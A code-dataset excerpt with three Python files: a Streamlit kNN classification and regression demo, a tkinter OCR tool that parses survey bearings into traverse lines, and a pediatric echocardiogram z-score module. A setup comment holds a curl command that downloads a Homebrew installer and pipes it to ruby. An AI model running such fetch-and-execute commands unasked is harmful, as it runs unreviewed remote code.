= (y_train == 1)\r\n\r\n y_test_0 = (predictions == 0)\r\n y_test_1 = (predictions == 1)\r\n\r\n plt.plot(X_train[y_train_0, 0], X_train[y_train_0, 1], 'bo', label=\"Train 0\")\r\n plt.plot(X_train[y_train_1, 0], X_train[y_train_1, 1], 'g^', label=\"Train 1\")\r\n\r\n plt.plot(X_test[y_test_0, 0], X_test[y_test_0, 1], 'ro', label=\"Test 0\")\r\n plt.plot(X_test[y_test_1, 0], X_test[y_test_1, 1], 'r^', label=\"Test 1\")\r\n\r\n plt.legend()\r\n \r\n \r\ndef plot_regression(test_size,n):\r\n # setting stage to show 3 (sub)plots side-by-side\r\n X_train, X_test, y_train, y_test = data_split_regression(test_size)\r\n fig, axes = plt.subplots(1, 3, figsize=(15, 4))\r\n\r\n # create 1,000 data points, evenly spaced between -3 and 3\r\n import numpy as np\r\n line = np.linspace(-3, 3, 1000).reshape(-1, 1)\r\n\r\n\r\n # loop over k=1,3,9 and over axes\r\n for n_neighbors, ax in zip([n, n+2, n+8], axes):\r\n\r\n # make predictions using 1, 3, or 9 neighbors\r\n reg = KNeighborsRegressor(n_neighbors=n_neighbors)\r\n reg.fit(X_train, y_train)\r\n\r\n # plot and show\t\r\n ax.plot(line, reg.predict(line))\r\n ax.plot(X_train, y_train, '^', c=mglearn.cm2(0), markersize=8)\r\n ax.plot(X_test, y_test, 'v', c=mglearn.cm2(1), markersize=8)\r\n\r\n ax.set_title(\r\n \"{} neighbor(s)\\n train score: {:.2f} test score: {:.2f}\".format(\r\n n_neighbors, reg.score(X_train, y_train),\r\n reg.score(X_test, y_test)))\r\n\r\n ax.set_xlabel(\"Feature\")\r\n ax.set_ylabel(\"Target\")\r\n\r\n\r\n axes[0].legend([\"Model predictions\", \"Training data/target\",\r\n \"Test data/target\"], loc=\"best\")\r\n \r\n\r\ndef main():\r\n \r\n st.set_option('deprecation.showPyplotGlobalUse',False)\r\n st.title('Streamlit kNN app for classification and Regression')\r\n st.write('Aim is to demo basic concepts.Select the option given on the left to proceed:')\r\n st.sidebar.header('User Inputs')\r\n problem_type=st.sidebar.radio('Problem Type',(\"Classification\",\"Regression\"),key = 'problem_type')\r\n \r\n if problem_type=='Classification':\r\n menu=[\"Dummy Data Plot\",\"Different n plot with Dummy Data\",\"kNN Classification with Dummy Data\",\"kNN on Real dataset\"]\r\n choice=st.sidebar.selectbox(\"Menu\",menu)\r\n \r\n if choice==\"Dummy Data Plot\":\r\n st.markdown(\"### Simulated dataset plot\")\r\n #st.write('How many data points to simulate in 2D')\r\n st.pyplot(simulate_data_classification())\r\n \r\n if choice==\"Different n plot with Dummy Data\":\r\n st.markdown(\"### Plot with different neighbors\")\r\n st.write('How many neighbors you want to consider')\r\n n=st.sidebar.slider(\"Select the number of neighbors\",1,5)\r\n st.text('Selected: {}'.format(n))\r\n st.pyplot(kNN_mglearn_classification(n))\r\n st.write('The stars in the graph above are the unlabeled units for which we have to predict the class.')\r\n \r\n if choice==\"kNN Classification with Dummy Data\":\r\n st.markdown(\" ## Accuracy and plot for kNN classification\")\r\n #st.sidebar.subheader(\"Data Partition\")\r\n st.sidebar.subheader(\"Data Partition\")\r\n tt_split = st.sidebar.expander(\"Train/Test Split\")\r\n test_size = tt_split.number_input(\"Enter Test size (proportion)\",0.10,0.99,step=0.1,key=\"test_size\",value=0.30)\r\n n=st.sidebar.slider(\"Select the number of neighbors\",1,5)\r\n \r\n X_train,X_test,y_train,y_test,clf=data_split_classification(test_size,n)\r\n \r\n predictions=clf.predict(X_test)\r\n #st.write(\"Specs of the kNN: \", clf, \"\\n\")\r\n \r\n # apply trained model on test\r\n st.markdown(\" ## Evaluating kNN Performance\")\r\n st.write(\"kNN training set score:\",round(clf.score(X_train,y_train),2),\"\\n\")\r\n #st.write(\"kNN test set prediction:\",predictions)\r\n st.write(\"kNN test set score:\",round(clf.score(X_test,y_test),2),\"\\n\")\r\n st.pyplot(kNN_classification_pred_plot(test_size,n))\r\n st.write('The red points are test data. Their shape (triangle vs circle) tells us of the class they were assigned to.')\r\n \r\n if choice==\"kNN on Real dataset\":\r\n uploaded_file = st.sidebar.file_uploader(\"Choose a CSV file\", accept_multiple_files=False,type=['csv'],key='uploaded_file')\r\n if uploaded_file is not None:\r\n data = load_data(uploaded_file)\r\n data_1=data.copy()\r\n \r\n data_1=preprocess_data(data_1)\r\n if st.sidebar.checkbox(\"Show raw data\",False):\r\n st.write(data)\r\n st.write('Above is raw data')\r\n \r\n if st.sidebar.checkbox(\"Show Preproces data\",False):\r\n st.write(data_1)\r\n st.write('Above is Data After Preprocessing')\r\n \r\n \r\n st.sidebar.subheader(\"Features Selection & Data Partition\")\r\n #if st.sidebar.checkbox(\"Train/Test Split (default 70:30)\",False,key='t_t_split') :\r\n tt_split = st.sidebar.beta_expander(\"Train/Test Split\")\r\n target = tt_split.selectbox(\"Select Target Variable\",data_1.columns,key=\"target\")\r\n predictors = [v for v in data_1.columns if v!=target]\r\n new_predictors = tt_split.multiselect(\"Select Predictors\",options=predictors,default=predictors)\r\n test_size = tt_split.number_input(\"Enter Test size (proportion)\",0.10,0.99,step=0.1,key=\"test_size\",value=0.30)\r\n class_names = data_1[target].unique()\r\n \r\n if tt_split.checkbox(\"Dataset with selected features\",False):\r\n st.write(data_1[new_predictors])\r\n st.write(\"Above is the dataset with selected features\")\r\n \r\n if tt_split.checkbox(\"Split the dataset\",False):\r\n X_train, X_test, y_train, y_test = split(data_1,test_size,target,new_predictors)\r\n st.write('X Train Data shape after splitting',X_train.shape)\r\n st.write('X Test Data shape after splitting',X_test.shape)\r\n \r\n st.sidebar.subheader(\"Model Development\")\r\n n=st.sidebar.slider(\"Select the number of neighbors for kNN\",1,10)\r\n st.sidebar.subheader('Click the below button after selecting a particular n value')\r\n \r\n if st.sidebar.button(\"Accuracy Vs neighbours Plot\"):\r\n # deine empty lists to capture output\r\n training_accuracy = []\r\n test_accuracy = []\r\n \r\n # try n_neighbors from 1 to 10\r\n neighbors_settings = range(1, n+1)\r\n \r\n # use a for loop over k=1 to 10\r\n for n_neighbors in neighbors_settings:\r\n\r\n # build the model\r\n clf = KNeighborsClassifier(n_neighbors=n_neighbors)\r\n clf.fit(X_train, y_train)\r\n\r\n # record training set accuracy\r\n training_accuracy.append(clf.score(X_train, y_train))\r\n \r\n # record generalization accuracy\r\n test_accuracy.append(clf.score(X_test, y_test))\r\n \r\n # now plot the results and see \r\n plt.plot(neighbors_settings, training_accuracy, label=\"training accuracy\")\r\n plt.plot(neighbors_settings, test_accuracy, label=\"test accuracy\")\r\n plt.ylabel(\"Accuracy\")\r\n plt.xlabel(\"n_neighbors\")\r\n plt.legend()\r\n st.pyplot()\r\n \r\n \r\n if problem_type=='Regression':\r\n \r\n menu=[\"Dummy data plot\",\"kNN on Dummy Set with different n\",\"kNN on Dummy Set\",\"kNN Regression on Real Dataset\"]\r\n choice=st.sidebar.selectbox(\"Menu\",menu)\r\n \r\n if choice==\"Dummy data plot\":\r\n st.markdown(\"### Simulated Dataset Plot\")\r\n #st.write('How many data points to simulate in 2D')\r\n st.pyplot(simulate_data_regression())\r\n st.write('In the above figure Vertical axis is target or Y variable. Horiz axis is a feature or a (say) 1-D projection of feature set.Given locations of new data (green stars) on the X-axis, what is their predicted Y value')\r\n \r\n if choice==\"kNN on Dummy Set with different n\":\r\n st.markdown(\"### Plot with different neighbors\")\r\n st.write('How many neighbors you want to consider')\r\n n=st.sidebar.slider(\"Select the number of neighbors\",1,5,value=1)\r\n st.text('Selected: {}'.format(n))\r\n st.pyplot(kNN_mglearn_regression(n))\r\n st.write('From the above figure Under kNN(k=1), the predicted Y is merely the same Y as that of the nearest neighbor on the x-axis to the new data point.Same carries over as weighted mean Y of k nearest neighbors when analyzed with kNN(k=k).')\r\n \r\n if choice==\"kNN on Dummy Set\":\r\n \r\n st.markdown(\" ## Accuracy and plot for kNN regression\")\r\n st.sidebar.subheader(\"Data Partition\")\r\n tt_split = st.sidebar.beta_expander(\"Train/Test Split\")\r\n test_size = tt_split.number_input(\"Enter Test size (proportion)\",0.10,0.99,step=0.1,key=\"test_size\",value=0.30)\r\n n=st.sidebar.slider(\"Select the number of neighbors\",1,5)\r\n X_train, X_test, y_train, y_test = data_split_regression(test_size)\r\n\r\n # instantiate the model and set the number of neighbors to consider to 3\r\n reg = KNeighborsRegressor(n_neighbors=n).fit(X_train, y_train)\r\n\r\n st.write(\"kNN test set predictions:\\n\",reg.predict(X_test),\"\\n\")\r\n st.write(\"Test set R^2: \",round(reg.score(X_test,y_test),2),\"\\n\")\r\n \r\n st.pyplot(plot_regression(test_size,n))\r\n st.write(\"Note how the regression line (blue line connecting the blue triangle data) smoothens out and flattens out as k rises\")\r\n\r\n st.write(\"Note also how the training and test score (akin to R^2) changes with k\")\r\n\r\n st.write(\"At k=1 overfits the data (hence training RMSE=0 & score=1) but generalizes very poorly to unseen test data (score is merely 0.35)\")\r\n\r\n st.write(\"Seems, k=3 is ideal with test score actually beating even training score\")\r\n \r\n \r\n if choice==\"kNN Regression on Real Dataset\":\r\n uploaded_file = st.sidebar.file_uploader(\"Choose a CSV file\", accept_multiple_files=False,type=['csv'],key='uploaded_file')\r\n if uploaded_file is not None:\r\n data = load_data(uploaded_file)\r\n \r\n data_2=data.copy()\r\n \r\n data_2=preprocess_data(data_2)\r\n if st.sidebar.checkbox(\"Show raw data\",False):\r\n st.write(data)\r\n st.write('Above is raw data')\r\n \r\n if st.sidebar.checkbox(\"Show Preproces data\",False):\r\n st.write(data_2)\r\n st.write('Above is Data After Preprocessing')\r\n \r\n st.sidebar.subheader(\"Features Selection & Data Partition\")\r\n \r\n #if st.sidebar.checkbox(\"Train/Test Split (default 70:30)\",False,key='t_t_split') :\r\n tt_split = st.sidebar.beta_expander(\"Train/Test Split\")\r\n target = tt_split.selectbox(\"Select Target Variable\",data_2.columns,key=\"target\")\r\n predictors = [v for v in data_2.columns if v!=target]\r\n new_predictors = tt_split.multiselect(\"Select Predictors\",options=predictors,default=predictors)\r\n test_size = tt_split.number_input(\"Enter Test size (proportion)\",0.10,0.99,step=0.1,key=\"test_size\",value=0.30)\r\n class_names = data_2[target].unique()\r\n \r\n if tt_split.checkbox(\"Dataset with selected features\",False):\r\n st.write(data_2[new_predictors])\r\n st.write('Above is the dataset with selected features')\r\n \r\n if tt_split.checkbox(\"Split the dataset\",False):\r\n X_train, X_test, y_train, y_test = split(data_2,test_size,target,new_predictors)\r\n st.write('X Train Data shape after splitting',X_train.shape)\r\n st.write('X Test Data shape after splitting',X_test.shape)\r\n \r\n st.sidebar.subheader(\"Model Development\")\r\n \r\n n=st.sidebar.slider(\"Select the number of neighbors for kNN\",1,10)\r\n \r\n st.sidebar.subheader('Click the below button after selecting a particular n value')\r\n if st.sidebar.button(\"Plot\"):\r\n # deine empty lists to capture output\r\n \r\n rmse_values=[]\r\n training_accuracy = []\r\n test_accuracy = []\r\n \r\n # try n_neighbors from 1 to 10\r\n neighbors_settings = range(1, n+1)\r\n \r\n # use a for loop over k=1 to 10\r\n for n_neighbors in neighbors_settings:\r\n\r\n # build the model\r\n reg = KNeighborsRegressor(n_neighbors=n_neighbors)\r\n reg.fit(X_train, y_train)\r\n \r\n y_pred=reg.predict(X_test)\r\n \r\n err=math.sqrt(mean_squared_error(y_test,y_pred))\r\n \r\n rmse_values.append(err)\r\n # record training set accuracy\r\n training_accuracy.append(reg.score(X_train, y_train))\r\n \r\n # record generalization accuracy\r\n test_accuracy.append(reg.score(X_test, y_test))\r\n \r\n # now plot the results and see \r\n plt.subplot(2, 1, 1)\r\n plt.plot(neighbors_settings, rmse_values, label=\"RMSE\")\r\n plt.ylabel(\"RMSE\")\r\n plt.xlabel(\"n_neighbors\")\r\n \r\n plt.subplot(2, 1, 2)\r\n # now plot the results and see \r\n plt.plot(neighbors_settings, training_accuracy, label=\"training accuracy\")\r\n plt.plot(neighbors_settings, test_accuracy, label=\"test accuracy\")\r\n plt.ylabel(\"Accuracy\")\r\n plt.xlabel(\"n_neighbors\")\r\n plt.legend()\r\n st.pyplot()\r\n \r\n \r\n \r\nif __name__=='__main__':\r\n main()\r\n","repo_name":"ManishKumar-4/Streamlit-Apps","sub_path":"kNN/lec2a_knn_streamlit.py","file_name":"lec2a_knn_streamlit.py","file_ext":"py","file_size_in_byte":19173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34114985045","text":"# 1, Download visual studio code at https://code.visualstudio.com/ and then insall\n# 2, Install extension python whose authon is microsoft\n# 3, Download python at https://www.python.org/downloads/ Python 3.8.1 and then install\n# 4, test if python is install sucessfully by typing python3 -m tkinter, you will see a small windows if installed sucessfully\n# 5, install pillow by typing pip3 install pillow\n# 6, install pytesseract by typing pip3 install pytesseract \n# 7, install tesseract by typing brew install tesseract\n# 8, if has not install brew, install it by typing \n#/usr/bin/ruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)\"\n\n# image to string \nimport pytesseract\n\n# Tkinter is Python's de-facto standard GUI (Graphical User Interface) Package\n# It is a thin object-oriented layer on top of Tcl/Tk. \nimport tkinter as tk\nimport os\n\n# Regular expression \nimport re\nfrom tkinter import messagebox\n#PIL Python image libarary \nfrom PIL import ImageTk, ImageGrab, Image\n\ndirDict = {'left': 'L', 'right': 'R','north': 'N', 'south': 'S', 'west': 'W', 'east': 'E'}\nmainWindow = tk.Tk()\n# mainWindow.geometry('500x500')\n\nimageLabel = tk.Label(mainWindow, width = 50, height = 50) # , width=82\nimageLabel.grid(row=0, column=0, sticky='nsew')\n\ntextOcr = tk.Text(mainWindow)\ntextOcr.grid(row=0, column=1, sticky=\"nsew\")\n\ntextResult = tk.Text(mainWindow)\ntextResult.grid(row=0, column=2, sticky=\"nsew\")\n\n\n# searchcurve function is for curve \n\ndef searchcurve(text, regex, description, resultdict):\n # declared a variable, store the result later\n result = \"\"\n \n for matches in re.finditer(regex, text, re.IGNORECASE):\n \n # convert current match to dictionary \n gd = matches.groupdict() \n \n #messagebox.showinfo(message = str(gd))\n\n if matches.group('radius') is None :\n messagebox.showinfo(message = 'radius is none')\n\n radiusfeet = ''\n if matches.group('radiusfeet') is None :\n messagebox.showinfo(message = 'radiusfeet is none')\n else:\n radiusfeet = matches.group('radiusfeet')\n\n curvedir = ''\n if matches.group(\"curvedir\") is None:\n messagebox.showinfo(message = 'curvedir')\n else: \n curvedir = dirDict[matches.group('curvedir').lower()]\n\n dir1 = ''\n # it will show a messagebox from tkinter \n if matches.group('dir1') is None :\n messagebox.showinfo(message='dir1 is none')\n else:\n #messagebox.showinfo(message =matches.group(\"dir1\"))\n dir1 = dirDict[matches.group('dir1').lower()]\n \n degrees = ''\n if matches.group('degrees') is None :\n messagebox.showinfo(message='degrees is none')\n else:\n #messagebox.showinfo(message =matches.group(\"degrees\"))\n degrees = matches.group('degrees')\n \n minutes = ''\n if \"minutes\" in gd:\n #messagebox.showinfo(message= matches.group(\"minutes\"))\n minutes = matches.group('minutes')\n if minutes is None:\n minutes = \"00\"\n else:\n #messagebox.showinfo(message =\"doesn't have minutes\")\n minutes = \"00\"\n\n seconds = ''\n if \"seconds\" in gd:\n #messagebox.showinfo(message= matches.group(\"seconds\"))\n seconds = matches.group('seconds')\n if seconds is None:\n seconds = \"00\"\n else:\n messagebox.showinfo(message =\"doesn't have seconds\")\n seconds = \"00\"\n \n dir2 = ''\n if matches.group('dir2') is None :\n messagebox.showinfo(message='dir2 is none')\n else:\n dir2 = dirDict[matches.group('dir2').lower()]\n #messagebox.showinfo(message = dir2)\n \n\n feet = ''\n if matches.group('feet') is None :\n messagebox.showinfo(message='feet is none')\n else:\n feet = matches.group('feet')\n #messagebox.showinfo(message = \"feet is: \" + feet)\n\n\n\n resultdict[matches.start()] = \"NC \" + \"R \" + radiusfeet + \" C \" + feet + \" C \" + dir1 + degrees + \"-\" + minutes + \"-\" + seconds + dir2 + \" \" + curvedir + '\\n'\n resultdict[-matches.start()] = matches.end()-matches.start()\n #result = result + \"NC \" + \"R \" + radiusfeet + \" C \" + feet + \" C \" + dir1 + degrees + \"-\" + minutes + \"-\" + seconds + dir2 + \" \" + curvedir + '\\n'\n #messagebox.showinfo(message= \"result is: \" + result)\n\n # delete to avoid duplication prints \n \n # insert the result to the text box\n # result = description + '\\n' + \"*******\"+ \"\\n\"+ result+\"\\n\"\n # textResult.insert(tk.END, result)\n\n\n# search 1 function is for DD \ndef search1(text, regex, description, resultdict):\n # declared a variable, store the result later\n result = \"\"\n # regular expression\n # The 'r' in front tells Python the expression is a raw string. \n # search the text using regex \n # Two ways \n\n # to comment out in VS use command+? \n # loop from the result text, using the pattern of the regex, the third independent varaible is for non-case sensititve\n # m = re.search(regex, text, re.IGNORECASE)\n # if m is None:\n # messagebox.showinfo(message='can not find any result')\n # else:\n # messagebox.showinfo(message='find result')\n\n \n for matches in re.finditer(regex, text, re.IGNORECASE):\n \n # convert current match to dictionary \n gd = matches.groupdict() \n isduplicated = False\n for pos, text in resultdict.items(): \n if pos > 0 and -pos in resultdict.keys(): \n if matches.start() >= pos and matches.end() <= pos + resultdict[-pos]:\n isduplicated = True \n \n\n if isduplicated:\n continue \n #messagebox.showinfo(message = str(gd))\n\n dir1 = ''\n # it will show a messagebox from tkinter \n if matches.group('dir1') is None :\n messagebox.showinfo(message='dir1 is none')\n else:\n #messagebox.showinfo(message =matches.group(\"dir1\"))\n dir1 = dirDict[matches.group('dir1').lower()]\n \n degrees = ''\n if matches.group('degrees') is None :\n messagebox.showinfo(message='degrees is none')\n else:\n #messagebox.showinfo(message =matches.group(\"degrees\"))\n degrees = matches.group('degrees')\n \n # minutes = ''\n # if matches.group('minutes') is None :\n # messagebox.showinfo(message='minutes is none')\n # else:\n # #messagebox.showinfo(message =matches.group(\"minutes\"))\n # minutes = matches.group('minutes')\n # debug \n \n minutes = ''\n if \"minutes\" in gd:\n #messagebox.showinfo(message= matches.group(\"minutes\"))\n minutes = matches.group('minutes')\n if minutes is None:\n minutes = \"00\"\n else:\n #messagebox.showinfo(message =\"doesn't have minutes\")\n minutes = \"00\"\n\n seconds = ''\n if \"seconds\" in gd:\n #messagebox.showinfo(message= matches.group(\"seconds\"))\n seconds = matches.group('seconds')\n if seconds is None:\n seconds = \"00\"\n else:\n messagebox.showinfo(message =\"doesn't have seconds\")\n seconds = \"00\"\n \n dir2 = ''\n if matches.group('dir2') is None :\n messagebox.showinfo(message='dir2 is none')\n else:\n dir2 = dirDict[matches.group('dir2').lower()]\n #messagebox.showinfo(message = dir2)\n \n\n feet = ''\n if matches.group('feet') is None :\n messagebox.showinfo(message='feet is none')\n else:\n feet = matches.group('feet')\n #messagebox.showinfo(message = \"feet is: \" + feet)\n\n resultdict[matches.start()] = \"DD \" + dir1 + degrees + \"-\" + minutes + \"-\" + seconds + dir2 + \" \" + feet + '\\n'\n \n #result = result + \"DD \" + dir1 + degrees + \"-\" + minutes + \"-\" + seconds + dir2 + \" \" + feet + '\\n'\n #messagebox.showinfo(message= \"result is: \" + result)\n\n # delete to avoid duplication prints \n \n # insert the result to the text box\n #result = description + '\\n' + \"*******\"+ \"\\n\"+ result+\"\\n\"\n #textResult.insert(tk.END, result)\n\ndef searchall(text):\n textResult.delete(1.0, tk.END)\n\n resultdict = dict()\n\n # search curve \n searchcurve(text, r\"(?Pradius)(?:.|\\n)*?(?P\\d+.?\\d+?.?\\d+?)\\W+feet(?:.|\\n)*?(?Pleft|right)(?:.|\\n)*?(?PSouth|North|West|East)\\W+(?P\\d+)\\W+degrees?\\W+((?P\\d+)\\W+minutes?\\W+)?((?P\\d+)\\W+seconds?\\W+)?(?PSouth|North|West|East)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+?.?\\d+?)\\W+feet\", \n \"\"\"Curve direction: Format 1 : # it will tell you if it turns to the left or to the right \"\"\", resultdict)\n\n # search DD \n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P\\d+)\\W+degrees?\\W+((?P\\d+)\\W+minutes?\\W+)?((?P\\d+)\\W+seconds?\\W+)?(?PSouth|North|West|East)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+?.?\\d+?)\\W+feet\", \n \"Format1-A: North/East/South/West 00 Degrees 00 Minutes 00 Seconds North/East/South/West 00.00 feet\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P\\d+)\\W+degrees?\\W+((?P\\d+)\\W+minutes?\\W+)?((?P\\d+)\\W+seconds?\\W+)?(?PSouth|North|West|East)(?:.|\\n)*?(?P\\d+.?\\d+)\\W+feet\",\n \"Format1-A does not deal with ()\", resultdict)\n search1(text, r\"\\W+(?PNorth|South|West|East)\\W+(?:.|\\n)*?\\((?P\\d+.?\\d+?)?\\)\\W+?degrees?(?:.|\\n)*?\\((?P\\d+.?\\d+?)?\\)\\W+?minutes?((?:.|\\n){1,16}\\((?P\\d+.?\\d+?)?\\)\\W+seconds)?\\W+(?PNorth|South|West|East)\\W+(?:(?:.|\\n)*?\\((?P\\d+.?\\d+.?\\d+?)?\\))\\W+feet\",\n \"Format1-B North/East/South/West (00) degrees (00) minutes (00) seconds North/East/South/West Two Hundred Forty-two and Twenty-three Hundredths (242.23) feet\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P\\d+)\\W+deg?\\W+((?P\\d+)\\W+min?\\W+)?((?P\\d+)\\W+sec?\\W+)?(?PSouth|North|West|East)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+)\\W+feet\",\n \"Format1-C: North/East/South/West 00 deg 00 min 00 sec North/East/South/West\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?PSouth|North|West|East)(?:.|\\n)*?(?P\\d+(?:\\.|\\,)?\\d+?(?:\\.|\\,)?(\\d+)?).*?\\W+feet\",\n \"\"\"Format 2 North/East/South/West 00°00’00’’ North/East/South/West\"\"\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?P[?0-9]?[?0-9])?\\W+?(?PSouth|North|West|East)(?:.|\\n)*?(?P\\d+\\d+\\W?\\d+).*?(feet|ft)\", \n \"Format 2 does not deal with ()\", resultdict)\n search1(text, r\"\\W+(?PS|N|W|E)\\W+(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?P[?0-9]?[?0-9])?\\W+?(?PS|N|W|E)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+)\\W+feet\",\n \"\"\"Format 3-A N/E/S/W 00°00’00’’ N/E/S/W feet \"\"\", resultdict)\n search1(text, r\"\\W+(?PS|N|W|E)\\W+(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?P[?0-9]?[?0-9])?\\W+?(?PS|N|W|E)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+)\\W+feet\",\n \"\"\"Format 3-B N/E/S/W 00°00’00’’ N/E/S/W feet \"\"\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P\\d+)\\W+degrees?\\W(?P[0-9]?[0-9])?\\W+?(?P[0-9]?[0-9])?\\W+?(?PSouth|North|West|East)(?:.|\\n)*?(?P\\d+.?(\\d+)?\\.?(\\d+)?)\",\n \"\"\"Format 4-A North/East/South/West 00 degrees 00’00’’ North/East/South/West\"\"\", resultdict)\n search1(text, r\"\\W+(?PS|N|W|E)\\W+(?P\\d+)\\W+degrees?\\W(?P[0-9]?[0-9])?\\W+?(?P[0-9]?[0-9])?\\W+?(?PS|N|W|E)(?:.|\\n)*?(?P\\d+\\W?\\d+\\W+\\d+)\",\n \"\"\"Format 4-B N/E/S/W 00 degrees 00’00’’ N/E/S/W\"\"\", resultdict)\n \n newdict = sorted(resultdict.keys()) \n for position in newdict: \n if position >= 0:\n\n # result = str(position) + \": \" + resultdict[position] \n result = resultdict[position] \n textResult.insert(tk.END, result)\n\ndef imgps():\n #try:\n temp_path = os.getcwd() + \"/temp.png\" # Current folder path\n\n im = ImageGrab.grabclipboard() # Get image from clipboard\n im.save(temp_path, format='PNG') # save image to temp folder\n \n \n loadedImage = ImageTk.PhotoImage(im) # load image from temp folder\n imageLabel.config(image=loadedImage) # set image to label\n imageLabel.image = loadedImage # save reference to image in memory\n # imageLabel.clipboard_clear() # clear clipboard\n\n text = pytesseract.image_to_string(Image.open(temp_path))\n \n #messagebox.showinfo(message=\"so far so good\")\n textOcr.delete(1.0, tk.END)\n textOcr.insert(tk.END, text)\n\n searchall(text)\n \n # messagebox.showinfo(message=text)\n\n # os.remove(temp_path) # delete temp file\n\n #except:\n #messagebox.showinfo(message=\"Clipboard is Empty Or Some Exception Occured.\")\n\n\ndef traverse_file(): # when you convert to text \n # get the text from the text box, \n # set the value to input value \n # extract information from the input value \n # https://tkdocs.com/tutorial/text.html\n inputValue = textOcr.get(\"1.0\",\"end-1c\")\n #messagebox.showinfo(message=inputValue)\n searchall(inputValue)\n\nbutton = tk.Button(mainWindow, text=\"Recognize\", command=imgps)\nbutton.grid(row=1, column=0, sticky='nsew')\n\nbuttonconvert = tk.Button(mainWindow, text=\"Convert to Traverse\", command=traverse_file)\nbuttonconvert.grid(row=1, column=1, sticky='nsew')\n\nmainWindow.mainloop()","repo_name":"KathySu/webRecognize","sub_path":"PDFtoTXTcurveformat1-A.py","file_name":"PDFtoTXTcurveformat1-A.py","file_ext":"py","file_size_in_byte":14145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13929504808","text":"# !/usr/bin/env python\n\nfrom __future__ import division\nimport math\n\nrequired = ['bsa']\nbsaMethod = 'Haycock'\n\nconstraints = {'age': [0, '18y']}\n\nname = 'Lopez et al., Circ Cardiovasc Imaging 2017'\ndescription = 'Z-scores for Two Dimensional Echocardiographic Measurements Indexed to BSA using an Allometric Model'\n\ndetail = '''This is the data from the Pediatric Heart Network 'Echo Z-Score Project', a multi-year\n multi-institutional project, ultimately evaluating over 3200\npatients ≤ 18 years.\n\n>BSA raised to a specified power is a good parameter for cardiovascular allometric scaling, and none of the\nZ score models for the measurements in this study were affected by age, sex, race, or ethnicity.\n\n'''\ncritique = {\n 'model': 'allometric index',\n 'subjects': 3215,\n}\n\nyear = '2017'\ncitation = {\n 'title': 'Relationship of Echocardiographic Z Scores Adjusted for Body Surface Area to Age, Sex, Race, and Ethnicity.',\n 'authors': '''Lopez L, Colan S, Stylianou M, Granger S, Trachtenberg F, Frommelt P, Pearson\nG, Camarda J, Cnota J, Cohen M, Dragulescu A, Frommelt M, Garuba O, Johnson T,\nLai W, Mahgerefteh J, Pignatelli R, Prakash A, Sachdeva R, Soriano B, Soslow J,\nSpurney C, Srivastava S, Taylor C, Thankavel P, van der Velde M, Minich L;\nPediatric Heart Network Investigators''',\n 'journal': 'Circ Cardiovasc Imaging. 2017 Nov;10(11). ',\n 'url': 'https://www.ncbi.nlm.nih.gov/pubmed/29138232'\n}\n\n\nclass Base(object):\n '''\n This is the base class for the Lopez/PHN data.\n The basic form of these equations is values indexed to BSA using an allometric exponent:\n z = [ ( parameter / BSA ^ x ) - mean value of indexed parameter ] / sd of indexed parameter\n '''\n\n def __init__(self, data, pt, limit):\n self.source = name\n self.citation = citation\n self.siteName = data['name']\n self.refName = 'lopez_circimaging_2017'\n self.exponent = data['exp']\n self.imean = data['mean'] # the indexed mean\n self.isd = data['sd'] # the indexed sd\n self.limit = limit\n self.bsaMethod = bsaMethod\n self.bsa = pt.bsa(bsaMethod)\n self.score = float(getattr(pt, data['name']))\n self.constraints = constraints\n self.critique = critique\n self.exceptions = ['mv_area', 'tv_area', 'lmca', 'lad', 'prox_rca',\n 'lv_eda_psax', 'lv_eda_epi_psax', 'lvedv', 'lvedv_epi',\n 'lvm_2d', 'lv_mass_vol_ratio', 'lvpw_lvedd_ratio',\n 'lv_sphere_idx'] # do not convert as mm to cm\n\n\n def mean(self):\n indexedMean = self.imean\n actualMean = indexedMean * math.pow(self.bsa, self.exponent)\n actualMean = actualMean if self.siteName in self.exceptions else actualMean * 10\n return actualMean\n\n\n def zscore(self):\n score = self.score if self.siteName in self.exceptions else self.score/10\n mean = self.imean\n sd = self.isd\n\n try:\n return (score / math.pow(self.bsa, self.exponent) - mean) / sd\n except:\n return None # property of object 'pt' does not exist\n\n def uln(self):\n iLimit = self.imean + self.limit * self.isd\n actualLimit = iLimit * math.pow(self.bsa, self.exponent)\n actualLimit = actualLimit if self.siteName in self.exceptions else actualLimit * 10\n return actualLimit\n\n def lln(self):\n iLimit = self.imean - self.limit * self.isd\n actualLimit = iLimit * math.pow(self.bsa, self.exponent)\n actualLimit = actualLimit if self.siteName in self.exceptions else actualLimit * 10\n return actualLimit\n\n\n\n#\n# individual site data\n#\n\nmvd_ap = {'name': 'mvd_ap', 'exp': 0.50, 'mean': 2.31, 'sd': 0.24}\nmvd_l = {'name': 'mvd_l', 'exp': 0.50, 'mean': 2.23, 'sd': 0.22}\nmv_area = {'name': 'mv_area', 'exp': 1.00, 'mean': 4.06, 'sd': 0.68}\ntvd_ap = {'name': 'tvd_ap', 'exp': 0.50, 'mean': 2.36, 'sd': 0.28}\ntvd_l = {'name': 'tvd_l', 'exp': 0.50, 'mean': 2.36, 'sd': 0.29}\ntv_area = {'name': 'tv_area', 'exp': 1.00, 'mean': 4.39, 